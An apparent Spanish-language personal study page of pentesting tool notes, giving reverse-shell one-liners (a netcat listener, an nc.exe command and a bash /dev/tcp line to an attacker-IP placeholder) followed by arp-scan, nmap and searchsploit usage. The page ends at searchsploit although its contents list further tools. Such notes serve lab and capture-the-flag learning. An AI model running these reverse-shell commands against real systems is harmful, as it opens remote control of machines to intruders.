
<!doctype html>
<html lang="en" class="no-js">
  <head>
    
      <meta charset="utf-8">
      <meta name="viewport" content="width=device-width,initial-scale=1">
      
      
      
      
        <link rel="prev" href="../VulnerabilityWeb/">
      
      
      
      <link rel="icon" href="../../../assets/images/favicon.png">
      <meta name="generator" content="mkdocs-1.6.1, mkdocs-material-9.6.18">
    
    
      
        <title>Herramientas de pentesting - InfoSec & Dev by Isaías</title>
      
    
    
      <link rel="stylesheet" href="../../../assets/stylesheets/main.7e37652d.min.css">
      
        
        <link rel="stylesheet" href="../../../assets/stylesheets/palette.06af60db.min.css">
      
      


    
    
      
    
    
      
        
        
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
        <link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,300i,400,400i,700,700i%7CRoboto+Mono:400,400i,700,700i&display=fallback">
        <style>:root{--md-text-font:"Roboto";--md-code-font:"Roboto Mono"}</style>
      
    
    
    <script>__md_scope=new URL("../../..",location),__md_hash=e=>[...e].reduce(((e,_)=>(e<<5)-e+_.charCodeAt(0)),0),__md_get=(e,_=localStorage,t=__md_scope)=>JSON.parse(_.getItem(t.pathname+"."+e)),__md_set=(e,_,t=localStorage,a=__md_scope)=>{try{t.setItem(a.pathname+"."+e,JSON.stringify(_))}catch(e){}}</script>
    
      

    
    
    
  </head>
  
  
    
    
      
    
    
    
    
    <body dir="ltr" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="pink">
  
    
    <input class="md-toggle" data-md-toggle="drawer" type="checkbox" id="__drawer" autocomplete="off">
    <input class="md-toggle" data-md-toggle="search" type="checkbox" id="__search" autocomplete="off">
    <label class="md-overlay" for="__drawer"></label>
    <div data-md-component="skip">
      
        
        <a href="#herramientas-de-pentesting" class="md-skip">
          Skip to content
        </a>
      
    </div>
    <div data-md-component="announce">
      
    </div>
    
    
      

<header class="md-header" data-md-component="header">
  <nav class="md-header__inner md-grid" aria-label="Header">
    <a href="../../.." title="InfoSec &amp; Dev by Isaías" class="md-header__button md-logo" aria-label="InfoSec & Dev by Isaías" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    <label class="md-header__button md-icon" for="__drawer">
      
      <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M3 6h18v2H3zm0 5h18v2H3zm0 5h18v2H3z"/></svg>
    </label>
    <div class="md-header__title" data-md-component="header-title">
      <div class="md-header__ellipsis">
        <div class="md-header__topic">
          <span class="md-ellipsis">
            InfoSec & Dev by Isaías
          </span>
        </div>
        <div class="md-header__topic" data-md-component="header-topic">
          <span class="md-ellipsis">
            
              Herramientas de pentesting
            
          </span>
        </div>
      </div>
    </div>
    
      
        <form class="md-header__option" data-md-component="palette">
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="default" data-md-color-primary="indigo" data-md-color-accent="pink"  aria-label="Cambiar a modo oscuro"  type="radio" name="__palette" id="__palette_0">
    
      <label class="md-header__button md-icon" title="Cambiar a modo oscuro" for="__palette_1" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="m17.75 4.09-2.53 1.94.91 3.06-2.63-1.81-2.63 1.81.91-3.06-2.53-1.94L12.44 4l1.06-3 1.06 3zm3.5 6.91-1.64 1.25.59 1.98-1.7-1.17-1.7 1.17.59-1.98L15.75 11l2.06-.05L18.5 9l.69 1.95zm-2.28 4.95c.83-.08 1.72 1.1 1.19 1.85-.32.45-.66.87-1.08 1.27C15.17 23 8.84 23 4.94 19.07c-3.91-3.9-3.91-10.24 0-14.14.4-.4.82-.76 1.27-1.08.75-.53 1.93.36 1.85 1.19-.27 2.86.69 5.83 2.89 8.02a9.96 9.96 0 0 0 8.02 2.89m-1.64 2.02a12.08 12.08 0 0 1-7.8-3.47c-2.17-2.19-3.33-5-3.49-7.82-2.81 3.14-2.7 7.96.31 10.98 3.02 3.01 7.84 3.12 10.98.31"/></svg>
      </label>
    
  
    
    
    
    <input class="md-option" data-md-color-media="" data-md-color-scheme="slate" data-md-color-primary="indigo" data-md-color-accent="pink"  aria-label="Cambiar a modo claro"  type="radio" name="__palette" id="__palette_1">
    
      <label class="md-header__button md-icon" title="Cambiar a modo claro" for="__palette_0" hidden>
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 7a5 5 0 0 1 5 5 5 5 0 0 1-5 5 5 5 0 0 1-5-5 5 5 0 0 1 5-5m0 2a3 3 0 0 0-3 3 3 3 0 0 0 3 3 3 3 0 0 0 3-3 3 3 0 0 0-3-3m0-7 2.39 3.42C13.65 5.15 12.84 5 12 5s-1.65.15-2.39.42zM3.34 7l4.16-.35A7.2 7.2 0 0 0 5.94 8.5c-.44.74-.69 1.5-.83 2.29zm.02 10 1.76-3.77a7.131 7.131 0 0 0 2.38 4.14zM20.65 7l-1.77 3.79a7.02 7.02 0 0 0-2.38-4.15zm-.01 10-4.14.36c.59-.51 1.12-1.14 1.54-1.86.42-.73.69-1.5.83-2.29zM12 22l-2.41-3.44c.74.27 1.55.44 2.41.44.82 0 1.63-.17 2.37-.44z"/></svg>
      </label>
    
  
</form>
      
    
    
      <script>var palette=__md_get("__palette");if(palette&&palette.color){if("(prefers-color-scheme)"===palette.color.media){var media=matchMedia("(prefers-color-scheme: light)"),input=document.querySelector(media.matches?"[data-md-color-media='(prefers-color-scheme: light)']":"[data-md-color-media='(prefers-color-scheme: dark)']");palette.color.media=input.getAttribute("data-md-color-media"),palette.color.scheme=input.getAttribute("data-md-color-scheme"),palette.color.primary=input.getAttribute("data-md-color-primary"),palette.color.accent=input.getAttribute("data-md-color-accent")}for(var[key,value]of Object.entries(palette.color))document.body.setAttribute("data-md-color-"+key,value)}</script>
    
    
    
      
      
        <label class="md-header__button md-icon" for="__search">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        </label>
        <div class="md-search" data-md-component="search" role="dialog">
  <label class="md-search__overlay" for="__search"></label>
  <div class="md-search__inner" role="search">
    <form class="md-search__form" name="search">
      <input type="text" class="md-search__input" name="query" aria-label="Search" placeholder="Search" autocapitalize="off" autocorrect="off" autocomplete="off" spellcheck="false" data-md-component="search-query" required>
      <label class="md-search__icon md-icon" for="__search">
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M9.5 3A6.5 6.5 0 0 1 16 9.5c0 1.61-.59 3.09-1.56 4.23l.27.27h.79l5 5-1.5 1.5-5-5v-.79l-.27-.27A6.52 6.52 0 0 1 9.5 16 6.5 6.5 0 0 1 3 9.5 6.5 6.5 0 0 1 9.5 3m0 2C7 5 5 7 5 9.5S7 14 9.5 14 14 12 14 9.5 12 5 9.5 5"/></svg>
        
        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M20 11v2H8l5.5 5.5-1.42 1.42L4.16 12l7.92-7.92L13.5 5.5 8 11z"/></svg>
      </label>
      <nav class="md-search__options" aria-label="Search">
        
        <button type="reset" class="md-search__icon md-icon" title="Clear" aria-label="Clear" tabindex="-1">
          
          <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M19 6.41 17.59 5 12 10.59 6.41 5 5 6.41 10.59 12 5 17.59 6.41 19 12 13.41 17.59 19 19 17.59 13.41 12z"/></svg>
        </button>
      </nav>
      
    </form>
    <div class="md-search__output">
      <div class="md-search__scrollwrap" tabindex="0" data-md-scrollfix>
        <div class="md-search-result" data-md-component="search-result">
          <div class="md-search-result__meta">
            Initializing search
          </div>
          <ol class="md-search-result__list" role="presentation"></ol>
        </div>
      </div>
    </div>
  </div>
</div>
      
    
    
      <div class="md-header__source">
        <a href="https://github.com/godack1905" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M439.6 236.1 244 40.5c-5.4-5.5-12.8-8.5-20.4-8.5s-15 3-20.4 8.4L162.5 81l51.5 51.5c27.1-9.1 52.7 16.8 43.4 43.7l49.7 49.7c34.2-11.8 61.2 31 35.5 56.7-26.5 26.5-70.2-2.9-56-37.3L240.3 199v121.9c25.3 12.5 22.3 41.8 9.1 55-6.4 6.4-15.2 10.1-24.3 10.1s-17.8-3.6-24.3-10.1c-17.6-17.6-11.1-46.9 11.2-56v-123c-20.8-8.5-24.6-30.7-18.6-45L142.6 101 8.5 235.1C3 240.6 0 247.9 0 255.5s3 15 8.5 20.4l195.6 195.7c5.4 5.4 12.7 8.4 20.4 8.4s15-3 20.4-8.4l194.7-194.7c5.4-5.4 8.4-12.8 8.4-20.4s-3-15-8.4-20.4"/></svg>
  </div>
  <div class="md-source__repository">
    GitHub
  </div>
</a>
      </div>
    
  </nav>
  
</header>
    
    <div class="md-container" data-md-component="container">
      
      
        
          
            
<nav class="md-tabs" aria-label="Tabs" data-md-component="tabs">
  <div class="md-grid">
    <ul class="md-tabs__list">
      
        
  
  
  
  
    
    
      <li class="md-tabs__item">
        <a href="../../../en/" class="md-tabs__link">
          
  
  
  English

        </a>
      </li>
    
  

      
        
  
  
  
    
  
  
    
    
      <li class="md-tabs__item md-tabs__item--active">
        <a href="../../" class="md-tabs__link">
          
  
  
  Español

        </a>
      </li>
    
  

      
    </ul>
  </div>
</nav>
          
        
      
      <main class="md-main" data-md-component="main">
        <div class="md-main__inner md-grid">
          
            
              
              <div class="md-sidebar md-sidebar--primary" data-md-component="sidebar" data-md-type="navigation" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    


  


<nav class="md-nav md-nav--primary md-nav--lifted" aria-label="Navigation" data-md-level="0">
  <label class="md-nav__title" for="__drawer">
    <a href="../../.." title="InfoSec &amp; Dev by Isaías" class="md-nav__button md-logo" aria-label="InfoSec & Dev by Isaías" data-md-component="logo">
      
  
  <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M12 8a3 3 0 0 0 3-3 3 3 0 0 0-3-3 3 3 0 0 0-3 3 3 3 0 0 0 3 3m0 3.54C9.64 9.35 6.5 8 3 8v11c3.5 0 6.64 1.35 9 3.54 2.36-2.19 5.5-3.54 9-3.54V8c-3.5 0-6.64 1.35-9 3.54"/></svg>

    </a>
    InfoSec & Dev by Isaías
  </label>
  
    <div class="md-nav__source">
      <a href="https://github.com/godack1905" title="Go to repository" class="md-source" data-md-component="source">
  <div class="md-source__icon md-icon">
    
    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 448 512"><!--! Font Awesome Free 7.0.0 by @fontawesome - https://fontawesome.com License - https://fontawesome.com/license/free (Icons: CC BY 4.0, Fonts: SIL OFL 1.1, Code: MIT License) Copyright 2025 Fonticons, Inc.--><path fill="currentColor" d="M439.6 236.1 244 40.5c-5.4-5.5-12.8-8.5-20.4-8.5s-15 3-20.4 8.4L162.5 81l51.5 51.5c27.1-9.1 52.7 16.8 43.4 43.7l49.7 49.7c34.2-11.8 61.2 31 35.5 56.7-26.5 26.5-70.2-2.9-56-37.3L240.3 199v121.9c25.3 12.5 22.3 41.8 9.1 55-6.4 6.4-15.2 10.1-24.3 10.1s-17.8-3.6-24.3-10.1c-17.6-17.6-11.1-46.9 11.2-56v-123c-20.8-8.5-24.6-30.7-18.6-45L142.6 101 8.5 235.1C3 240.6 0 247.9 0 255.5s3 15 8.5 20.4l195.6 195.7c5.4 5.4 12.7 8.4 20.4 8.4s15-3 20.4-8.4l194.7-194.7c5.4-5.4 8.4-12.8 8.4-20.4s-3-15-8.4-20.4"/></svg>
  </div>
  <div class="md-source__repository">
    GitHub
  </div>
</a>
    </div>
  
  <ul class="md-nav__list" data-md-scrollfix>
    
      
      
  
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_1" >
        
          
          <label class="md-nav__link" for="__nav_1" id="__nav_1_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    English
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_1_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_1">
            <span class="md-nav__icon md-icon"></span>
            English
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../en/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Home
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_1_2" >
        
          
          <label class="md-nav__link" for="__nav_1_2" id="__nav_1_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Writeups
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_1_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_1_2">
            <span class="md-nav__icon md-icon"></span>
            Writeups
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../en/writeups/FirstHacking/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    First Hacking
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../en/writeups/Injection/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Injection
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../en/writeups/Trust/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Trust
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../en/writeups/Obsession/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Obsession
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_1_3" >
        
          
          <label class="md-nav__link" for="__nav_1_3" id="__nav_1_3_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Notes
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_1_3_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_1_3">
            <span class="md-nav__icon md-icon"></span>
            Notes
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../en/notes/VulnerabilityWeb/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Most common vulnerabilities
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../../en/notes/Tools/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Pentesting tools
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
      
      
  
  
    
  
  
  
    
    
    
    
      
        
        
      
      
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--section md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2" checked>
        
          
          <label class="md-nav__link" for="__nav_2" id="__nav_2_label" tabindex="">
            
  
  
  <span class="md-ellipsis">
    Español
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="1" aria-labelledby="__nav_2_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_2">
            <span class="md-nav__icon md-icon"></span>
            Español
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Inicio
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2_2" >
        
          
          <label class="md-nav__link" for="__nav_2_2" id="__nav_2_2_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Writeups
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_2_2_label" aria-expanded="false">
          <label class="md-nav__title" for="__nav_2_2">
            <span class="md-nav__icon md-icon"></span>
            Writeups
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../writeups/FirstHacking/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    First Hacking
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../writeups/Injection/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Injection
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../writeups/Trust/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Trust
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../../writeups/Obsession/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Obsession
    
  </span>
  

      </a>
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
              
                
  
  
    
  
  
  
    
    
    
    
      
      
    
    
    <li class="md-nav__item md-nav__item--active md-nav__item--nested">
      
        
        
        <input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_2_3" checked>
        
          
          <label class="md-nav__link" for="__nav_2_3" id="__nav_2_3_label" tabindex="0">
            
  
  
  <span class="md-ellipsis">
    Apuntes
    
  </span>
  

            <span class="md-nav__icon md-icon"></span>
          </label>
        
        <nav class="md-nav" data-md-level="2" aria-labelledby="__nav_2_3_label" aria-expanded="true">
          <label class="md-nav__title" for="__nav_2_3">
            <span class="md-nav__icon md-icon"></span>
            Apuntes
          </label>
          <ul class="md-nav__list" data-md-scrollfix>
            
              
                
  
  
  
  
    <li class="md-nav__item">
      <a href="../VulnerabilityWeb/" class="md-nav__link">
        
  
  
  <span class="md-ellipsis">
    Vulnerabilidades web mas comunes
    
  </span>
  

      </a>
    </li>
  

              
            
              
                
  
  
    
  
  
  
    <li class="md-nav__item md-nav__item--active">
      
      <input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
      
      
        
      
      
        <label class="md-nav__link md-nav__link--active" for="__toc">
          
  
  
  <span class="md-ellipsis">
    Herramientas de pentesting
    
  </span>
  

          <span class="md-nav__icon md-icon"></span>
        </label>
      
      <a href="./" class="md-nav__link md-nav__link--active">
        
  
  
  <span class="md-ellipsis">
    Herramientas de pentesting
    
  </span>
  

      </a>
      
        

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#0-como-obtener-una-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      0. Como obtener una reverse shell
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#1-arp-scan" class="md-nav__link">
    <span class="md-ellipsis">
      1. arp-scan
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-nmap" class="md-nav__link">
    <span class="md-ellipsis">
      2. nmap
    </span>
  </a>
  
    <nav class="md-nav" aria-label="2. nmap">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#21-enumeracion-de-puertos" class="md-nav__link">
    <span class="md-ellipsis">
      2.1. Enumeración de puertos
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#22-extraccion-de-informacion-de-los-puertos" class="md-nav__link">
    <span class="md-ellipsis">
      2.2. Extracción de información de los puertos
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-searchsploits" class="md-nav__link">
    <span class="md-ellipsis">
      3. Searchsploits
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-msfvenom" class="md-nav__link">
    <span class="md-ellipsis">
      4. Msfvenom
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-nessus" class="md-nav__link">
    <span class="md-ellipsis">
      5. Nessus
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#6-burpsuite" class="md-nav__link">
    <span class="md-ellipsis">
      6. Burpsuite
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#7-gobuster" class="md-nav__link">
    <span class="md-ellipsis">
      7. Gobuster
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#8-hash-identifier-john-the-ripper" class="md-nav__link">
    <span class="md-ellipsis">
      8. Hash-identifier + John The Ripper
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#9-hydra" class="md-nav__link">
    <span class="md-ellipsis">
      9. Hydra
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

              
            
          </ul>
        </nav>
      
    </li>
  

    
  </ul>
</nav>
                  </div>
                </div>
              </div>
            
            
              
              <div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
                <div class="md-sidebar__scrollwrap">
                  <div class="md-sidebar__inner">
                    

<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
  
  
  
    
  
  
    <label class="md-nav__title" for="__toc">
      <span class="md-nav__icon md-icon"></span>
      Table of contents
    </label>
    <ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
      
        <li class="md-nav__item">
  <a href="#0-como-obtener-una-reverse-shell" class="md-nav__link">
    <span class="md-ellipsis">
      0. Como obtener una reverse shell
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#1-arp-scan" class="md-nav__link">
    <span class="md-ellipsis">
      1. arp-scan
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#2-nmap" class="md-nav__link">
    <span class="md-ellipsis">
      2. nmap
    </span>
  </a>
  
    <nav class="md-nav" aria-label="2. nmap">
      <ul class="md-nav__list">
        
          <li class="md-nav__item">
  <a href="#21-enumeracion-de-puertos" class="md-nav__link">
    <span class="md-ellipsis">
      2.1. Enumeración de puertos
    </span>
  </a>
  
</li>
        
          <li class="md-nav__item">
  <a href="#22-extraccion-de-informacion-de-los-puertos" class="md-nav__link">
    <span class="md-ellipsis">
      2.2. Extracción de información de los puertos
    </span>
  </a>
  
</li>
        
      </ul>
    </nav>
  
</li>
      
        <li class="md-nav__item">
  <a href="#3-searchsploits" class="md-nav__link">
    <span class="md-ellipsis">
      3. Searchsploits
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#4-msfvenom" class="md-nav__link">
    <span class="md-ellipsis">
      4. Msfvenom
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#5-nessus" class="md-nav__link">
    <span class="md-ellipsis">
      5. Nessus
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#6-burpsuite" class="md-nav__link">
    <span class="md-ellipsis">
      6. Burpsuite
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#7-gobuster" class="md-nav__link">
    <span class="md-ellipsis">
      7. Gobuster
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#8-hash-identifier-john-the-ripper" class="md-nav__link">
    <span class="md-ellipsis">
      8. Hash-identifier + John The Ripper
    </span>
  </a>
  
</li>
      
        <li class="md-nav__item">
  <a href="#9-hydra" class="md-nav__link">
    <span class="md-ellipsis">
      9. Hydra
    </span>
  </a>
  
</li>
      
    </ul>
  
</nav>
                  </div>
                </div>
              </div>
            
          
          
            <div class="md-content" data-md-component="content">
              <article class="md-content__inner md-typeset">
                
                  


  
  


<h1 id="herramientas-de-pentesting">Herramientas de pentesting</h1>
<h2 id="0-como-obtener-una-reverse-shell">0. Como obtener una <em>reverse shell</em></h2>
<p>Primero de todo hemos de ejecutar en nuestra terminal el siguiente comando (nos da una tty sin tratar)</p>
<pre><code class="language-bash">nc -nlvp {puerto}
</code></pre>
<p>Este comando nos hara estar en escucha en el puerto que determinemos en espera de que la máquina víctima nos envie la reverse shell.</p>
<ul>
<li>Windows<ol>
<li>Descargamos netcat</li>
<li>Ejecutamos:</li>
</ol>
</li>
</ul>
<pre><code class="language-bash">./nc.exe {ip atacante} {puerto} -l cmd.exe
</code></pre>
<ul>
<li>Linux<ol>
<li>Ejecutamos:</li>
</ol>
</li>
</ul>
<pre><code class="language-bash">bash -i &gt;&amp; /dev/tcp/{ip atacante}/{puerto} 0&gt;&amp;1 
</code></pre>
<p>Una vez obtenida la reverse shell, para poder manejar la terminal de una manera mas sencilla, hacemos el siguiente tratamiento:</p>
<pre><code class="language-bash">script /dev/null -c bash
stty raw -echo; fg
reset xterm
export TERM=xterm
</code></pre>
<p>Así ya podemos interactuar desde una tty completamente interactiva. </p>
<hr />
<h2 id="1-arp-scan">1. <em>arp-scan</em></h2>
<p>La herramienta <em>arp-scan</em> sirve para escanear toda la red (la que le indicamos, en este caso es solo la red local) para encontrar la @IP de la máquina víctima. El comando mas utilizado es:</p>
<pre><code class="language-bash">arp-scan -I {iface} --localnet
</code></pre>
<p>Donde el parametro <strong>iface</strong> corresponde a la interfaz de red que deseemos.</p>
<hr />
<h2 id="2-nmap">2. <em>nmap</em></h2>
<p>La herramienta nmap sirve para hacer escaneos de puertos. Esta herramienta es muy versátil, y se pueden realizar muchos tipos de escaneos. Los más útiles son los siguientes</p>
<h3 id="21-enumeracion-de-puertos">2.1. Enumeración de puertos</h3>
<p>Un primer escaneo para enumerar los puertos abiertos (y poder utilizar la utilidad extractPorts para verlos y copiarlos en el clipboard)</p>
<pre><code class="language-bash">nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn {@IP victim} -oG allPorts
</code></pre>
<p>A continuación explicamos cada parámetro:</p>
<ol>
<li><strong>-p-</strong> → escanea todos los puertos</li>
<li><strong>--open</strong> → filtra solo los puertos abiertos</li>
<li><strong>sS</strong> → aplica un escaneo con stelf scan (que es mas sigiloso porque no hace el 3 way handshake)</li>
<li><strong>--min-rate</strong> 5000→ no queremos que vaya mas lento que 5000 paquetes por segundo</li>
<li><strong>-vvv</strong> → triple verbose para que a medida que vaya encontrando puertos los vaya reportando por pantalla</li>
<li><strong>-n</strong> → para que no haga resolución DNS y vaya mas rápido</li>
<li><strong>-Pn</strong> → evita hacer un ping</li>
<li><strong>-oG</strong> allPorts→ exporta el resultado en formato <em>grepeable</em> al fichero que le digamos (en este caso <em>allPorts</em>)</li>
</ol>
<p>Gracias a que lo hemos exportado en un fichero en formato grepeable, podemos ejecutar una utilidad llamada <em>extractPorts</em> para obtener la información mas relevante:</p>
<pre><code class="language-bash">extractPorts allPorts
</code></pre>
<h3 id="22-extraccion-de-informacion-de-los-puertos">2.2. Extracción de información de los puertos</h3>
<p>Una vez ya tenemos los puertos listados, podemos realizar un segundo escaneo mas exhaustivo, mediante el siguiente comando</p>
<pre><code class="language-bash">nmap -sCV -p{PUERTOS COPIADOS} {@IP víctima} -oN targeted
</code></pre>
<p>A continuación explicamos cada parámetro:</p>
<ol>
<li><strong>-sCV</strong> → el parametro <em>sC</em> hace que se ejecuten todos los scripts de escaneo de nmap, y el parametro <em>V</em> te incluye tambien la version de los puertos que corren.</li>
<li><strong>-p</strong> → sirve para pasarle los puertos</li>
<li><strong>-oN targeted</strong> → lo exporta en formato normal (tal y como se ve en la terminal) al archivo targeted</li>
</ol>
<p>De esta manera, tenemos dos archivos. El primero es <em>allPorts</em> y es donde tenemos los puertos guardados en formato grepeable para poder ejecutar la utilidad <em>extractPorts</em>. El segundo fichero es el fichero <em>targeted</em> que esta guardado en formato normal para poder consultar en cualquier momento toda la información de los puertos mediante el comando:</p>
<pre><code class="language-bash">cat -l ruby targeted
</code></pre>
<p>Estos escaneos son los mas básicos, ya que a medida que vayamos avanzando, igual interesa listar puertos cerrados, puertos filtrados...</p>
<hr />
<h2 id="3-searchsploits">3. Searchsploits</h2>
<p>Esta herramienta es muy útil para buscar vulnerabilidades de servicios una vez hecho el escaneo, puesto que lista todos los exploits que encuentra en las bases de datos.</p>
<pre><code class="language-bash">searchsploits {servicio y version}
</code></pre>
